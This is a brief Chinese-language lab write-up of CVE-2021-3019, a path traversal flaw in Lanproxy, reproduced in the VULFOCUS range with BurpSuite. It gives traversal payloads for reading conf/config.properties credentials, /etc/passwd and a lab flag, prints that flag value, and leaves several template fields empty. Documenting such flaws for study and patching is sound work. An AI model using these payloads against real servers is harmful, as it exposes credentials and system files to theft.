[文件读取]lanproxy文件读取（CVE-2021-3019）

1.1漏洞描述 漏洞编号CVE-2021-3019漏洞类型文件读取漏洞等级⭐漏洞环境VULFOCUS攻击方式

描述: Lanproxy 路径遍历漏洞通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。

1.2漏洞等级

高危

1.3影响版本

 Lanproxy

1.4漏洞复现 1.4.1.基础环境 靶场VULFOCUS工具BurpSuite 1.4.2.前提

网站后台地址：

后台管理账密：

后台登录地址 ：

1.5深度利用 1.5.1漏洞点

/../conf/config.properties

查看内部网连接的凭据

查看/etc/passwd

../../../../../etc/passwd

查看tmp/flag

../../../../../tmp/flag

拿到flag

flag-{bmh909dda7b-bfc7-464d-97ee-0c81c36001b2}

 

1.6漏洞挖掘 1.6.1指纹信息

1.7修复建议

升级

打补丁

上设备